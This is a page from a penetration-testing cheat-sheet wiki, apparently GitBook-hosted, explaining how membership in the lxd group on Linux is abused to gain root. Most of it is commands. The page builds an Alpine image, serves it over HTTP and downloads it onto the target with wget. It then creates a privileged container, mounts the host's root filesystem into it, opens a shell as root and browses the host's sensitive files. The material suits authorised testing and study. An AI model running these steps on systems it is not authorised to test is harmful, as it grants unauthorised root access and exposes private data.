Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

LXC/LXD (Linux Container/Daemon) Privilege Escalation

LXD is a container management extension for Linux Containers (LXC).

PreviousGnuplot Privilege EscalationNextLinux Privilege Escalation

Last updated 1 year ago

  1. Check if You are in the Lxd Group

    If you belong to the Lxd group, you may be able to the root privileges.

    groups
id
Copied!

  2. Check if Container Image Exists

    List all images and check if a container image already exists.

    lxc image list
Copied!

    If there are not container, build a new image in your local machine.

    git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
python3 -m http.server 8000
Copied!

    In remote machine, download the “alpine-*.tar.gz” and import it.

    wget http://<local-ip>:8000/alpine-v3.17-x86_64-20221206_0615.tar.gz
lxc image import ./alpine-v3.17-x86_64-20221206_0615.tar.gz --alias testimage
lxc image list
Copied!

    After that, create a new container from the image.

    lxc init testimage testcontainer -c security.privileged=true
Copied!

    If you got the error “No storage pool found. Please create a new storage pool.”, initialize the lxd at first.

    lxd init
# Set default values in prompt
Copied!

    Then create a new container as above command.

  3. Mount the New Container to Root Directory

    Now mount the host's / directory onto /mnt/root in the container you created.

    lxc config device add testcontainer testdevice disk source=/ path=/mnt/root recursive=true
Copied!

  4. Start the Container

    lxc start testcontainer
Copied!

  5. Get a Shell

    lxc exec testcontainer /bin/sh
Copied!

    Check if you are root.

    whoami
Copied!

  6. Retrieve the Sensitive Information in the Mounted Directory

    cd /mnt/root/
Basic Flow
Page cover image